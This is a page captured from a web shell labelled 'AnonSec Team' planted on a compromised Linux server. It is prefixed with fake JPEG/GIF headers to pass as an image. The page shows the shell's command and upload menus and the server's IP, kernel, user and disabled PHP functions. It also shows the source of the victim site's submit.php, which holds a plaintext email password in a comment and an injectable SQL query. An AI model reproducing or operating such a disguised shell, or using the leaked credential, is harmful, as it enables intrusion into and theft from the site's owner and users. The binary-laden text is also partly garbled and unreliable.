����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.119.124.190
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/.well-known/../../www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/.well-known/../../www/submit.php
<?php
   include "db.php";
   include "header.php";
   include "sidebar.php";
   
  
     if(isset($_POST['finalsubmit'])){
       //$id=$_POST['id'];                 
      //$email=$_POST['username'];
      
      $log_id= $_SESSION['id']; 
      $targetdate=$_POST['targetdate'];
    
    
    $insert = $conn->prepare("UPDATE `profile` SET `targetdate`=? WHERE id=?" );
      
    $insert->bind_param("ss",$targetdate,$log_id);

      $res=$insert->execute(); 
        
        $email=$_POST['username'];
        $to = $email ; // this is your Email address
        $from = "dataentrywork@vflyorions.in"; // this is the sender's Email address 
    //   mail pass=DataEntry@2023 new creatwed dataentrywork@vflyorions.in
    
    
    $subject = "Data Entry work submission from Vflyorions Technology";
    $subject2 = " Data Entry User Work Details";
    $htmlContent = ' 
   <!doctype html>
    <html> 
    <head> 
       
    </head> 
    <body> 
    <p style="color:Black;font-size:18px;align="justify"><b>Congratulation! Your submission is done successfully.</b> <br>
      <b>Click on the below link and login with your work credentials to download and save your work excel sheet for any future reference</b> <br> 

      
      <b>This is Your download excelsheet link ,click here to download excelfile</b> All  file name should be given same as it is on the image file name.<br>
      https://vfly-sharad.vflyorions.in/work/job/login.php<br><br> 
       
       <b>Please read the following instruction carefully.</b></<br><br>

      After the download excel file  
      <br>
    
      All the completed work should be sent to Quality@vflyorions.com before given time. after that Files will not be accepted, No Excuses will be considered here after.<br>

     
      <br> Thank You !<br>
      </p> 
    </body> 
    </html>';
    
        // Set content-type header for sending HTML email 
    $headers = "MIME-Version: 1.0" . "\r\n"; 
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; 
     
    // Additional headers 
    $headers .= 'From: '.$from ; 
    
    mail($to,$subject,$htmlContent,$headers);    

      if($res)
      {
       $_SESSION['status']="Congrats Your work submited Successfully ";
       $_SESSION['status_code']="success"; 
     }
  
     }
    ?>
<link rel="stylesheet" href="https://cdn.datatables.net/1.13.1/css/jquery.dataTables.min.css"  />
<link rel="stylesheet" href="https://cdn.datatables.net/buttons/2.3.2/css/buttons.dataTables.min.css"  />
<main id="main" class="main">
   <div class="pagetitle">
      <!--  <h1>New Resume</h1> -->
      <nav>
         <ol class="breadcrumb">
           
         </ol>
      </nav>
   </div>
   <!-- End Page Title -->
   <!-- Content Wrapper. Contains page content -->
   <div class="content-wrapper" style="height: 38rem; margin-left: -17px;" >
      <!-- Content Header (Page header) -->
      <section class="content-header">
         <div class="container-fluid">
            <div class="card card-primary" style="width: fit-content;" >
               <div class="card-header">
                <?php
               $fetch1=("SELECT * from profile Where id=$log_id ");
               $result1 = $conn->query($fetch1);
              
               while($row1=$result1->fetch_assoc())
               {
                   $username=$row1['username'];
                   $startdate=$row1['startdate'];
               } 
               $targetdate='2023-03-27';
                ?>
                 <form method="post">
                     <div class="row">
                         <div class="col-lg-12 text-center">
                          <lable><b><span style="color:red">Alert:</span> If you have done/completed all your work then click on submit button.<br>
                           <b>Remember Once you submit your work, you wont have access to this panel,<br>this panel will be shutdown/close permanently<br></b>                          
                          </b></lable>
                        </div>
                        <div class="col-lg-12 text-center" style="padding-top:2rem;">
                            <p>This your eamil id after click on below Final Submission button, you provide further details in below mentioned mail-id </p>
                            <input type="hidden" name="targetdate" value="<?php echo $targetdate; ?>">
                            <input type="text" name="username" readonly value="<?php echo $username; ?>">
                           <input type="submit" class="btn btn-primary" onclick="return confirm('Are you sure to final submission')" name="finalsubmit" value="Final Submission">
                        </div>
                        <div class="col-lg-1">
                        </div>
                     </div>
                  </form>
               
               </div>
              
               <!-- /.card-body -->
            </div>
            <!-- /.card -->
         </div>
         <!-- /.col -->
   </div>
   <!-- /.row -->
   </div>
   <!-- /.container-fluid -->
   </section>
   <!-- /.content -->
   </div>
</main>


<script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>    
<?php  if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?>
<script>
   new swal({
   title: "<?php echo $_SESSION['status'];?>",
   //text: "You clicked the button!",
   icon: "<?php echo $_SESSION['status_code'];?>",
   button: "OK",
   }).then(function() {
   window.location = "logout2.php";
   });
</script>
<?php
   unset($_SESSION['status']);
   }
   ?>


<?php
    include "footer.php";
?>





<?php
//below old submit.php code
//   include "db.php";
//   include "header.php";
//   include "sidebar.php";
   ?>
<!--<link rel="stylesheet" href="https://cdn.datatables.net/1.13.1/css/jquery.dataTables.min.css"  />-->
<!--<link rel="stylesheet" href="https://cdn.datatables.net/buttons/2.3.2/css/buttons.dataTables.min.css"  />-->
<!--<main id="main" class="main">-->
<!--   <div class="pagetitle">-->
      <!--  <h1>New Resume</h1> -->
<!--      <nav>-->
<!--         <ol class="breadcrumb">-->
           
<!--         </ol>-->
<!--      </nav>-->
<!--   </div>-->
   <!-- End Page Title -->
   <!-- Content Wrapper. Contains page content -->
<!--   <div class="content-wrapper" style="height: 38rem; margin-left: -17px;" >-->
      <!-- Content Header (Page header) -->
<!--      <section class="content-header">-->
<!--         <div class="container-fluid">-->
<!--            <div class="card card-primary" style="width: fit-content;" >-->
<!--               <div class="card-header">-->

<!--                 <form method="post" action="all_form.php">-->
<!--                     <div class="row">-->
<!--                         <div class="col-lg-7">-->
<!--                          <lable><b>CLick Final Submition Button to Download and Submit the Excel File.</b></lable>-->
<!--                        </div>-->
<!--                        <div class="col-lg-4">-->
<!--                           <input type="submit" class="btn btn-primary" name="form" value="Final Submition">-->
<!--                        </div>-->
<!--                        <div class="col-lg-1">-->
<!--                        </div>-->
<!--                     </div>-->
<!--                  </form>-->
               
<!--               </div>-->
              
               <!-- /.card-body -->
<!--            </div>-->
            <!-- /.card -->
<!--         </div>-->
         <!-- /.col -->
<!--   </div>-->
   <!-- /.row -->
<!--   </div>-->
   <!-- /.container-fluid -->
<!--   </section>-->
   <!-- /.content -->
<!--   </div>-->
<!--</main>-->

<?php
    // include "footer.php";
?>


AnonSec - 2021